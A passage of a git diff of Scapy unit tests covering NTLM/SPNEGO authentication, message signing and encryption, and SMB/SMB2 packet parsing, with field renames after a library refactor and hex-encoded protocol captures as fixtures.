NTLM_NEGOTIATE) +assert ntlm_nego.Payload == [] +assert ntlm_nego.MessageType == 1 +assert ntlm_nego.NegotiateFlags.NEGOTIATE_UNICODE and ntlm_nego.NegotiateFlags.NEGOTIATE_SIGN and ntlm_nego.NegotiateFlags.NEGOTIATE_KEY_EXCH +assert ntlm_nego.NegotiateFlags == 0xe2898235 +assert ntlm_nego.ProductMajorVersion == 10 +assert ntlm_nego.ProductMinorVersion == 0 +assert ntlm_nego.ProductBuild == 19041 +assert bytes(ntlm_nego) == b'NTLMSSP\x00\x01\x00\x00\x005\x82\x89\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00aJ\x00\x00\x00\x0f' + += GSS_Accept_sec_context (SPNEGO_negTokenResp: NTLM_NEGOTIATE->NTLM_CHALLENGE) + +srvcontext, tok, negResult = server.GSS_Accept_sec_context(None, tok) +assert negResult == 1 +assert isinstance(tok, SPNEGO_negToken) +tok = SPNEGO_negToken(bytes(tok)) +assert isinstance(tok.token, SPNEGO_negTokenResp) +assert tok.token.negResult == 1 +assert tok.token.supportedMech.oid == '1.3.6.1.4.1.311.2.2.10' +assert isinstance(tok.token.responseToken, SPNEGO_Token) +assert tok.token.mechListMIC is None + +ntlm_chall = tok.token.responseToken.value +assert isinstance(ntlm_chall, NTLM_CHALLENGE) +assert ntlm_chall.NegotiateFlags == 0xe2898235 +assert ntlm_chall.getAv(2).Value == "DOMAIN" +assert ntlm_chall.getAv(1).Value == "WIN10" +assert ntlm_chall.getAv(4).Value == "domain.local" +assert ntlm_chall.getAv(3).Value == "WIN10.domain.local" +assert ntlm_chall.getAv(5).Value == "domain.local" +assert ntlm_chall.getAv(0) + += GSS_Init_sec_context (SPNEGO_negToken: NTLM_CHALLENGE->NTLM_AUTHENTICATE) + +clicontext, tok, negResult = client.GSS_Init_sec_context(clicontext, tok) +assert isinstance(tok, SPNEGO_negToken) +tok = SPNEGO_negToken(bytes(tok)) +assert isinstance(tok.token, SPNEGO_negTokenResp) +assert tok.token.negResult is None +assert tok.token.supportedMech is None +assert isinstance(tok.token.mechListMIC, SPNEGO_MechListMIC) +sig = NTLMSSP_MESSAGE_SIGNATURE(tok.token.mechListMIC.value.val) +assert sig.Version == 1 +assert sig.SeqNum == 0 +assert isinstance(tok.token.responseToken, SPNEGO_Token) + +ntlm_auth = NTLM_Header(tok.token.responseToken.value.val) +assert isinstance(ntlm_auth, NTLM_AUTHENTICATE_V2) +assert ntlm_auth.NegotiateFlags == 0xe2898235 +assert ntlm_auth.UserName == "User1" +assert ntlm_auth.DomainName == "DOMAIN" +assert ntlm_auth.Workstation == "WIN10" +assert ntlm_chall.TargetInfo[:6] == ntlm_auth.NtChallengeResponse.AvPairs[:6] +assert ntlm_auth.NtChallengeResponse.TimeStamp == ntlm_chall.getAv(7).Value +assert ntlm_auth.NtChallengeResponse.getAv(6).Value == 2 +assert ntlm_auth.NtChallengeResponse.getAv(9).Value == "host/WIN10" + += GSS_Accept_sec_context (SPNEGO_negToken: NTLM_AUTHENTICATE->Resp) + +srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok) +assert negResult == 0 # success :p +assert isinstance(tok, SPNEGO_negToken) +assert isinstance(tok.token, SPNEGO_negTokenResp) +assert tok.token.negResult == 0 +assert tok.token.supportedMech is None +assert tok.token.responseToken is None +assert isinstance(tok.token.mechListMIC, SPNEGO_MechListMIC) +sig = NTLMSSP_MESSAGE_SIGNATURE(tok.token.mechListMIC.value.val) +assert sig.Version == 1 +assert sig.SeqNum == 0 + += GSS_WrapEx/GSS_UnwrapEx: client sends a encrypted payload + +data_header = b"header" # signed but not encrypted +data = b"testAAAAAAAAAABBBBBBBBBCCCCCCCCCDDDDDDDDDEEEEEEEEE" # encrypted + +_msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +encrypted = _msgs[1].data +assert encrypted != data +decrypted = server.GSS_UnwrapEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=encrypted), + ], + sig +)[1].data +assert decrypted == data + += GSS_WrapEx/GSS_UnwrapEx: server answers back + +_msgs, sig = server.GSS_WrapEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +re_encrypted = _msgs[1].data +assert re_encrypted != data and re_encrypted != encrypted +decrypted = client.GSS_UnwrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=re_encrypted), + ], + sig +)[1].data +assert decrypted == data + += GSS_WrapEx/GSS_UnwrapEx: client continues with seqnum 1 + +_msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +encrypted = _msgs[1].data +assert encrypted != data +assert sig.SeqNum == 1 +decrypted = server.GSS_UnwrapEx( + srvcontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=encrypted), + ], + sig +)[1].data +assert decrypted == data + += GSS_WrapEx/GSS_UnwrapEx: inject fault + +_msgs, sig = client.GSS_WrapEx( + clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=data) + ] +) +encrypted = _msgs[1].data +assert encrypted != data +bad_data_header = data_header[:-3] + b"hey" +try: + client.GSS_UnwrapEx(clicontext, + [ + SSP.WRAP_MSG(conf_req_flag=False, sign=True, data=bad_data_header), + SSP.WRAP_MSG(conf_req_flag=True, sign=True, data=encrypted), + ], + sig + ) + assert False, "No error was reported, but there should have been one" +except ValueError: + pass + + ++ GSSAPI - Verify real exchange + += Parse token 0 from server + +from scapy.layers.gssapi import GSSAPI_BLOB + +tok0 = GSSAPI_BLOB( +b"\x60\x76\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x6c\x30\x6a\xa0\x3c" \ +b"\x30\x3a\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e\x06\x09" \ +b"\x2a\x86\x48\x82\xf7\x12\x01\x02\x02\x06\x09\x2a\x86\x48\x86\xf7" \ +b"\x12\x01\x02\x02\x06\x0a\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03" \ +b"\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa3\x2a\x30\x28" \ +b"\xa0\x26\x1b\x24\x6e\x6f\x74\x5f\x64\x65\x66\x69\x6e\x65\x64\x5f" \ +b"\x69\x6e\x5f\x52\x46\x43\x34\x31\x37\x38\x40\x70\x6c\x65\x61\x73" \ +b"\x65\x5f\x69\x67\x6e\x6f\x72\x65") + += Create server SPNEGOSSP + +from scapy.layers.ntlm import NTLM_NEGOTIATE, MD4le +from scapy.layers.spnego import SPNEGOSSP + +server = SPNEGOSSP( + [ + NTLMSSP( + IDENTITIES={ + "User1": MD4le("Password1!"), + }, + ), + ], + force_supported_mechtypes=tok0.innerToken.token.mechTypes +) + += Parse token 1 from client + +tok1 = GSSAPI_BLOB( +b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e" \ +b"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a" \ +b"\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82" \ +b"\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ +b"\x00\x00\x0a\x00\x61\x4a\x00\x00\x00\x0f") + +srvcontext, _, negResult = server.GSS_Accept_sec_context(None, tok1) +assert negResult == 1 + += Inject token 2 from server + +tok2 = GSSAPI_BLOB( +b"\xa1\x81\xca\x30\x81\xc7\xa0\x03\x0a\x01\x01\xa1\x0c\x06\x0a\x2b" \ +b"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x81\xb1\x04\x81\xae\x4e" \ +b"\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00\x00\x0c\x00\x0c\x00\x38" \ +b"\x00\x00\x00\x15\x82\x89\xe2\xdd\x92\xcd\x56\xcf\x74\xc6\x03\x00" \ +b"\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x6a\x00\x44\x00\x00\x00\x0a" \ +b"\x00\x63\x45\x00\x00\x00\x0f\x44\x00\x4f\x00\x4d\x00\x41\x00\x49" \ +b"\x00\x4e\x00\x02\x00\x0c\x00\x44\x00\x4f\x00\x4d\x00\x41\x00\x49" \ +b"\x00\x4e\x00\x01\x00\x06\x00\x44\x00\x43\x00\x31\x00\x04\x00\x18" \ +b"\x00\x64\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00\x2e\x00\x6c" \ +b"\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x03\x00\x20\x00\x44\x00\x43" \ +b"\x00\x31\x00\x2e\x00\x64\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e" \ +b"\x00\x2e\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x07\x00\x08" \ +b"\x00\x02\xea\x8e\xe8\xd2\x8d\xd9\x01\x00\x00\x00\x00") + +tok2.token.responseToken.value.show() + +# Inject challenge token +srvcontext.sub_context.chall_tok = tok2.token.responseToken.value + += Parse token 3 from client + +tok3 = GSSAPI_BLOB( +b"\xa1\x82\x01\xd7\x30\x82\x01\xd3\xa0\x03\x0a\x01\x01\xa2\x82\x01" \ +b"\xb6\x04\x82\x01\xb2\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03\x00\x00" \ +b"\x00\x18\x00\x18\x00\x78\x00\x00\x00\x12\x01\x12\x01\x90\x00\x00" \ +b"\x00\x0c\x00\x0c\x00\x58\x00\x00\x00\x0a\x00\x0a\x00\x64\x00\x00" \ +b"\x00\x0a\x00\x0a\x00\x6e\x00\x00\x00\x10\x00\x10\x00\xa2\x01\x00" \ +b"\x00\x15\x82\x88\xe2\x0a\x00\x61\x4a\x00\x00\x00\x0f\x6c\xf5\x94" \ +b"\xd3\x4b\x59\x37\x72\x4a\x63\xe0\xb8\xf1\x2e\xf7\x39\x44\x00\x4f" \ +b"\x00\x4d\x00\x41\x00\x49\x00\x4e\x00\x55\x00\x73\x00\x65\x00\x72" \ +b"\x00\x31\x00\x57\x00\x49\x00\x4e\x00\x31\x00\x30\x00\x00\x00\x00" \ +b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ +b"\x00\x00\x00\x00\x00\xd7\x44\x98\xd1\xdf\xdf\xd0\x5f\xaf\x33\xbe" \ +b"\x69\x12\xdf\x7f\x6d\x01\x01\x00\x00\x00\x00\x00\x00\x02\xea\x8e" \ +b"\xe8\xd2\x8d\xd9\x01\x24\x0a\x3b\xc1\x49\x92\xcc\x1e\x00\x00\x00" \ +b"\x00\x02\x00\x0c\x00\x44\x00\x4f\x00\x4d\x00\x41\x00\x49\x00\x4e" \ +b"\x00\x01\x00\x06\x00\x44\x00\x43\x00\x31\x00\x04\x00\x18\x00\x64" \ +b"\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00\x2e\x00\x6c\x00\x6f" \ +b"\x00\x63\x00\x61\x00\x6c\x00\x03\x00\x20\x00\x44\x00\x43\x00\x31" \ +b"\x00\x2e\x00\x64\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00\x2e" \ +b"\x00\x6c\x00\x6f\x00\x63\x00\x61\x00\x6c\x00\x07\x00\x08\x00\x02" \ +b"\xea\x8e\xe8\xd2\x8d\xd9\x01\x06\x00\x04\x00\x02\x00\x00\x00\x08" \ +b"\x00\x30\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ +b"\x20\x00\x00\xc5\xb6\xc9\x62\xcc\x25\x74\x2d\xc9\x64\xc0\xcb\x01" \ +b"\xe8\xae\x03\x12\x56\xa9\xfa\x84\xcb\x37\xcd\xa6\xae\x6e\x5b\xe2" \ +b"\x16\x52\xbb\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ +b"\x00\x00\x00\x00\x00\x00\x00\x09\x00\x24\x00\x63\x00\x69\x00\x66" \ +b"\x00\x73\x00\x2f\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36" \ +b"\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x30\x00\x00" \ +b"\x00\x00\x00\x00\x00\x00\x00\x2a\xdf\x42\x60\xc7\x4b\xac\x30\xa0" \ +b"\x47\xdc\xcd\xb5\x5e\x13\x62\xa3\x12\x04\x10\x01\x00\x00\x00\x0f" \ +b"\x96\x54\xbb\x55\xd0\x6c\xcb\x00\x00\x00\x00") + +# Parse auth +srvcontext, tok, negResult = server.GSS_Accept_sec_context(srvcontext, tok3) +assert negResult == 0 + += Check mechListMIC against token 4 from server + +tok4 = GSSAPI_BLOB( +b"\xa1\x1b\x30\x19\xa0\x03\x0a\x01\x00\xa3\x12\x04\x10\x01\x00\x00" \ +b"\x00\xe3\x39\x61\x56\xbc\x42\x23\xdc\x00\x00\x00\x00") + +tok.show() +tok4.show() +assert tok.token.mechListMIC == tok4.token.mechListMIC diff --git a/test/scapy/layers/smb.uts b/test/scapy/layers/smb.uts index 38f8c1cc7c3..879551032c2 100644 --- a/test/scapy/layers/smb.uts +++ b/test/scapy/layers/smb.uts @@ -6,7 +6,9 @@ from scapy.layers.smb import * -= test SMB Negociate Header - dissect += test SMB Generic Header - dissect + +from scapy.layers.smb import _SMBGeneric # OK test rawpkt = b'\x45\x00\x00\x5b\x69\x10\x40\x00\x73\x06\xca\x85\x7a\xa0\x9a\xb6\xc0\xa8\xfe\x07\xeb\xec\x01\xbd\xaf\x97\x2e\xb7\x78\x60\x84\x6c\x50\x18\x40\x29\xd5\x36\x00\x00\x00\x00\x00\x2f\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x01\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x20\x18\x00\x00\x00\x00\x00\x0c\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00' @@ -29,7 +31,7 @@ pkt = IP(rawpkt) assert TCP in pkt assert NBTSession in pkt assert pkt[NBTSession].LENGTH == 47 -assert SMBNegociate_Protocol_Request_Header_Generic in pkt +assert _SMBGeneric in pkt # Should not have a proper SMBNegociate header as magic is \xf0SMB, not \xffSMB assert SMB_Header not in pkt @@ -61,13 +63,13 @@ assert SMBNegotiate_Response_Extended_Security in smb_nego_resp assert smb_nego_resp[SMBNegotiate_Response_Extended_Security].ServerTime == 131210789640364829 assert isinstance(smb_nego_resp.SecurityBlob, GSSAPI_BLOB) assert smb_nego_resp.SecurityBlob.MechType.oidname == 'SPNEGO - Simple Protected Negotiation' -assert smb_nego_resp.SecurityBlob.innerContextToken.token.mechTypes[0].oid.oidname == 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' +assert smb_nego_resp.SecurityBlob.innerToken.token.mechTypes[0].oid.oidname == 'NEGOEX - SPNEGO Extended Negotiation Security Mechanism' assert smb_nego_resp.ServerCapabilities.EXTENDED_SECURITY assert smb_nego_resp.Flags2.EXTENDED_SECURITY from uuid import UUID -negoex_nego = smb_nego_resp.SecurityBlob.innerContextToken.token.mechToken.value +negoex_nego = smb_nego_resp.SecurityBlob.innerToken.token.mechToken.value assert negoex_nego.MessageType == 1 assert negoex_nego.SequenceNum == 0 assert len(negoex_nego.Payload) == 1 @@ -92,8 +94,8 @@ smb_sax_req_1 = Ether(b'\x00PV\xc0\x00\x01\x00\x0c)a\xf5_\x08\x00E\x00\x00\xb6Qf assert SMBSession_Setup_AndX_Request_Extended_Security in smb_sax_req_1 assert smb_sax_req_1.Flags2.EXTENDED_SECURITY assert smb_sax_req_1.Flags2.UNICODE -assert isinstance(smb_sax_req_1.SecurityBlob.innerContextToken.token.mechToken.value, NTLM_NEGOTIATE) -ntlm_nego = smb_sax_req_1.SecurityBlob.innerContextToken.token.mechToken.value +assert isinstance(smb_sax_req_1.SecurityBlob.innerToken.token.mechToken.value, NTLM_NEGOTIATE) +ntlm_nego = smb_sax_req_1.SecurityBlob.innerToken.token.mechToken.value assert ntlm_nego.ProductBuild == 10586 = SMB Setup AndX Response (ES) diff --git a/test/scapy/layers/smb2.uts b/test/scapy/layers/smb2.uts index 0a9cae189af..c9c71545b42 100644 --- a/test/scapy/layers/smb2.uts +++ b/test/scapy/layers/smb2.uts @@ -16,9 +16,8 @@ smb2 = pkt[SMB2_Header] assert smb2.Start == b'\xfeSMB' assert smb2.StructureSize == 64 assert smb2.CreditCharge == 1 -assert smb2.CreditsRequested == 0 +assert smb2.CreditRequest == 0 assert smb2.Command == 0 -assert smb2.CreditsRequested == 0 assert smb2.Flags == 0 assert smb2.NextCommand == 0 assert smb2.MID == 0 @@ -73,8 +72,8 @@ assert nego_req.DialectCount == 4 assert nego_req.SecurityMode == 0 assert nego_req.Capabilities == 0x7f assert str(nego_req.ClientGUID) == 'f1849e59-619d-99ce-1f50-5c044474b10a' -assert nego_req.NegotiateContextOffset == 0x70 -assert nego_req.NegotiateCount == 4 +assert nego_req.NegotiateContextsBufferOffset == 0x70 +assert nego_req.NegotiateContextsCount == 4 for dialect in nego_req.Dialects: assert dialect in SMB_DIALECTS.keys() @@ -86,7 +85,7 @@ assert 0x300 in nego_req.Dialects assert 0x302 in nego_req.Dialects # Check SMB 3.1.1 assert 0x311 in nego_req.Dialects -assert len(nego_req.NegotiateContexts) == nego_req.NegotiateCount +assert len(nego_req.NegotiateContexts) == nego_req.NegotiateContextsCount = SMB2 Negotiate Context in Request - type PREAUTH - disassemble @@ -142,7 +141,8 @@ preauth = SMB2_Preauth_Integrity_Capabilities() preauth_context = SMB2_Negotiate_Context(ContextType = 1, DataLength = len(preauth)) / preauth pkt = SMB2_Negotiate_Protocol_Request(Dialects=[0x0202], NegotiateContexts=[preauth_context]) -assert pkt.__class__(raw(pkt)).NegotiateContexts is None +pkt = pkt.__class__(raw(pkt)).NegotiateContexts[0] +assert SMB2_Preauth_Integrity_Capabilities in pkt + SMB2 Negotiate Protocol Response Header dissecting @@ -160,18 +160,18 @@ nego_resp = pkt[SMB2_Negotiate_Protocol_Response] # check field values assert nego_resp.StructureSize == 0x41 -assert str(nego_resp.SecurityMode) == 'Signing Required' +assert str(nego_resp.SecurityMode) == 'SIGNING_ENABLED' assert nego_resp.DialectRevision == 0x0311 -assert nego_resp.NegotiateCount == 0x3 +assert nego_resp.NegotiateContextsCount == 0x3 assert str(nego_resp.GUID) == '1cdd6d53-1f30-4244-a5c8-88737a6805e1' assert nego_resp.Capabilities == 0x2f assert nego_resp.MaxTransactionSize == 0x00800000 assert nego_resp.MaxReadSize == 0x00800000 assert nego_resp.MaxWriteSize == 0x00800000 -assert nego_resp.SecurityBlobOffset == 0x00000080 -assert nego_resp.SecurityBlobLength == 320 -assert nego_resp.NegotiateContextOffset == 0x1c0 -assert bytes(nego_resp.SecurityBlob.innerContextToken.token.mechToken.value) == b"NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\xa1w\x02z2\xa9bx\n!\xfb\x9e,^\xe9x\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03n\xf8\xfdL\x08\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" +assert nego_resp.SecurityBlobBufferOffset == 0x00000080 +assert nego_resp.SecurityBlobLen == 320 +assert nego_resp.NegotiateContextsBufferOffset == 0x1c0 +assert bytes(nego_resp.SecurityBlob.innerToken.token.mechToken.value) == b"NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\xa1w\x02z2\xa9bx\n!\xfb\x9e,^\xe9x\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03n\xf8\xfdL\x08\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" assert len(nego_resp.NegotiateContexts) == 3 = SMB2 Negotiate Context in Response - Type PREAUTH @@ -209,14 +209,6 @@ pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negotiate_Protocol_Resp pkt = IP(raw(pkt)) assert SMB2_Negotiate_Protocol_Response in pkt -= Response with dialect different from 0x0311 - -preauth = SMB2_Preauth_Integrity_Capabilities() -preauth_context = SMB2_Negotiate_Context(ContextType = 1, DataLength = len(preauth)) / preauth - -pkt = SMB2_Negotiate_Protocol_Response(DialectRevision=0x0202, NegotiateContexts=[preauth_context]) -assert pkt.__class__(raw(pkt)).NegotiateContexts is None - + SMB2 Negotiate Procotol Request Header with 1 dialect = Common fields in header @@ -237,14 +229,14 @@ assert nego_req.DialectCount == 1 assert nego_req.SecurityMode == 0 assert nego_req.Capabilities == 0x7f assert str(nego_req.ClientGUID) == 'f1849e59-619d-99ce-1f50-5c044474b10a' -assert nego_req.NegotiateContextOffset == 0x68 -assert nego_req.NegotiateCount == 4 +assert nego_req.NegotiateContextsBufferOffset == 0x68 +assert nego_req.NegotiateContextsCount == 4 for dialect in nego_req.Dialects: assert dialect in SMB_DIALECTS.keys() # Check SMB 3.1.1 assert 0x311 in nego_req.Dialects -assert len(nego_req.NegotiateContexts) == nego_req.NegotiateCount +assert len(nego_req.NegotiateContexts) == nego_req.NegotiateContextsCount = SMB2 Negotiate Context in Request - type PREAUTH - disassemble @@ -295,13 +287,13 @@ assert netname.NetName == '192.168.178.21' pkt = SMB2_Negotiate_Protocol_Request() assert len(pkt.Dialects) == pkt.__class__(raw(pkt)).DialectCount -= Default NegotiateCount += Default NegotiateContextsCount preauth = SMB2_Preauth_Integrity_Capabilities() preauth_context = SMB2_Negotiate_Context(ContextType = 1, DataLength = len(preauth)) / preauth -pkt = SMB2_Negotiate_Protocol_Request(Dialects=[0x0311], NegotiateContexts=[preauth_context], NegotiateContextOffset=0x68) -assert len(pkt.NegotiateContexts) == pkt.__class__(raw(pkt)).NegotiateCount +pkt = SMB2_Negotiate_Protocol_Request(Dialects=[0x0311], NegotiateContexts=[preauth_context], NegotiateContextsBufferOffset=0x68) +assert len(pkt.NegotiateContexts) == pkt.__class__(raw(pkt)).NegotiateContextsCount + Negotiate Request without manual padding of Negotiate Contexts @@ -319,7 +311,7 @@ comp_context = SMB2_Negotiate_Context(ContextType = 3, DataLength = len(comp)) / netname = SMB2_Netname_Negotiate_Context_ID("192.168.178.21".encode("utf-16le")) netname_context = SMB2_Negotiate_Context(ContextType = 5, DataLength = len(netname)) / netname -pkt = SMB2_Header() / SMB2_Negotiate_Protocol_Request(Dialects=[0x0311], NegotiateContexts=[preauth_context, enc_context, comp_context, netname_context], NegotiateContextOffset=0x68) +pkt = SMB2_Header() / SMB2_Negotiate_Protocol_Request(Dialects=[0x0311], NegotiateContexts=[preauth_context, enc_context, comp_context, netname_context], NegotiateContextsBufferOffset=0x68) pkt = SMB2_Header(raw(pkt)) @@ -328,8 +320,8 @@ nego_req = pkt[SMB2_Negotiate_Protocol_Request] preauth_dissected = nego_req.NegotiateContexts[0] assert preauth_dissected.ContextType == preauth_context.ContextType assert preauth_dissected.DataLength == preauth_context.DataLength -assert preauth_dissected.HashAlgorithmCount == preauth_context.HashAlgorithmCount -assert preauth_dissected.SaltLength == preauth_context.SaltLength +assert preauth_dissected.HashAlgorithmCount == 1 +assert preauth_dissected.SaltLength == 0 assert len(preauth_dissected.HashAlgorithms) == len(preauth_context.HashAlgorithms) assert preauth_dissected.HashAlgorithms[0] == preauth_context.HashAlgorithms[0] @@ -338,7 +330,7 @@ assert preauth_dissected.HashAlgorithms[0] == preauth_context.HashAlgorithms[0] enc_dissected = nego_req.NegotiateContexts[1] assert enc_dissected.ContextType == enc_context.ContextType assert enc_dissected.DataLength == enc_context.DataLength -assert enc_dissected.CipherCount == enc_context.CipherCount +assert enc_dissected.CipherCount == 1 assert len(enc_dissected.Ciphers) == len(enc_context.Ciphers) assert enc_dissected.Ciphers[0] == enc_context.Ciphers[0] @@ -346,8 +338,8 @@ assert enc_dissected.Ciphers[0] == enc_context.Ciphers[0] comp_dissected = nego_req.NegotiateContexts[2] assert comp_dissected.ContextType == comp_context.ContextType -assert comp_dissected.DataLength == comp_context.DataLength -assert comp_dissected.CompressionAlgorithmCount == comp_context.CompressionAlgorithmCount +assert comp_dissected.DataLength == 8 +assert comp_dissected.CompressionAlgorithmCount == 0 assert len(comp_dissected.CompressionAlgorithms) == len(comp_context.CompressionAlgorithms) = SMB2 Negotiate Context in Request - type NETNAME NEGOCIATE @@ -357,6 +349,28 @@ assert netname_dissected.ContextType == netname_context.ContextType assert netname_dissected.DataLength == netname_context.DataLength assert netname_dissected.NetName == netname_context.NetName ++ SMB 2 Tree connect exchange + += SMB2 Tree connect request + +# this is a rare one, and is kindof a nightmare to setup. figure it out alexander + +tree_con = Ether(b'RT\x00\x1c\x91\x8dRT\x00O9T\x08\x00E\x00\x00\xb0\x91\n@\x00\x80\x06\xe7\x1f\xc0\xa8\x00e\xc0\xa8\x00h\xc2@\x01\xbd\xd6a\x0e\xc2gX\xca\xb8P\x18\x04\x02\x82\xc0\x00\x00\x00\x00\x00\x84\xfeSMB@\x00\x01\x00\x00\x00\x00\x00\x03\x00\x01\x00\x18\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00$\x08\x00\xe4\xd7o\xa1\x96\xf9mm\xca[%\x1c\x8bG\x8a\xd6\t\x00\x02\x00H\x00<\x00\\\x00\\\x00s\x00c\x00a\x00l\x00e\x00o\x00u\x00t\x00.\x00d\x00o\x00m\x00a\x00i\x00n\x00.\x00l\x00o\x00c\x00a\x00l\x00\\\x00s\x00h\x00a\x00r\x00e\x001\x00') +assert tree_con.Path == '\\\\scaleout.domain.local\\share1' +assert tree_con[SMB2_Tree_Connect_Request].Flags.REDIRECT_TO_OWNER + += SMB2 Tree connect response + +tree_con_resp = Ether(b'RT\x00O9TRT\x00\x1c\x91\x8d\x08\x00E\x00\x00\xfeM\xfb@\x00\x80\x06)\xe1\xc0\xa8\x00h\xc0\xa8\x00e\x01\xbd\xc2@gX\xca\xb8\xd6a\x0fJP\x18 \x13\x83\x0e\x00\x00\x00\x00\x00\xd2\xfeSMB@\x00\x01\x00\xcc\x00\x00\xc0\x03\x00\x01\x00\x19\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00$\x08\x00\x1a\xc0\nRt\xe7\x04\x1b;\xd3gV\xe0\x1e\x87\xd1\t\x00\x01\x00\x8a\x00\x00\x00\x82\x00\x00\x00SRdr0\x00\x00\x00\x03\x00\x00\x00`\x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0\xa8\x00il\x00\\\x00s\x00h\x00a\x00r\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0\xa8d\x8f\x1e\xd4.mk\xa0\xa3py\xa4\x9c\x8dJ\xc8\xd0\x9a\xfd\xc1\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x02\x00\x01\x00\x00\x00\\\x00\\\x00S\x00C\x00A\x00L\x00E\x00O\x00U\x00T\x00\\\x00s\x00h\x00a\x00r\x00e\x001\x00') +assert tree_con_resp.Status == 0xc00000cc +assert tree_con_resp.Flags.SMB2_FLAGS_SERVER_TO_REDIR + +ctx = SMB2_Error_ContextResponse(tree_con_resp.ErrorData) +assert ctx.ErrorId == 0x72645253 +assert ctx.ErrorContextData.NotificationType == 3 +assert ctx.ErrorContextData.ResourceName == '\\\\SCALEOUT\\share1' +assert [x.IPAddress for x in 